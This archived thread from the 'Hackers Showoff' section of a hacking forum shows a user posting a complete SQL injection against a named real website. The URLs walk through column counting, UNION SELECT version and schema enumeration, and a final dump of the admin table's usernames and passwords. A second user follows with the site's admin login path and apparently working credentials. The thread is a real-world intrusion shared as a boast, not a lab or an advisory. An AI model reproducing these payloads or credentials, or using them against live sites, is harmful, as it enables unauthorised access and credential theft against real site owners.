:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Hackers Showoff (http://www.vbspiders.com/vb/f91.html)
-   -   SQL INJECTION (http://www.vbspiders.com/vb/t35674.html)

CODE3 08-26-2010 02:26 PM
SQL INJECTION
 
http://www.tartanarmy.com/news/news.php?id=130

http://www.tartanarmy.com/news/news.php?id=130 order by 3

http://www.tartanarmy.com/news/news.php?id=130 order by 10

http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,5,6

http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,@@version,6

http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema= database ()


http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= tar_admin


http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)


أخيرأ


http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6 from tar_admin

X HuNter 08-26-2010 02:44 PM
http://www.tartanarmy.com/admin
gavin
gavin

CODE3 08-26-2010 02:47 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة X HuNter (المشاركة 203524)

مشكوررر عالمرورر


الساعة الآن 10:19 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0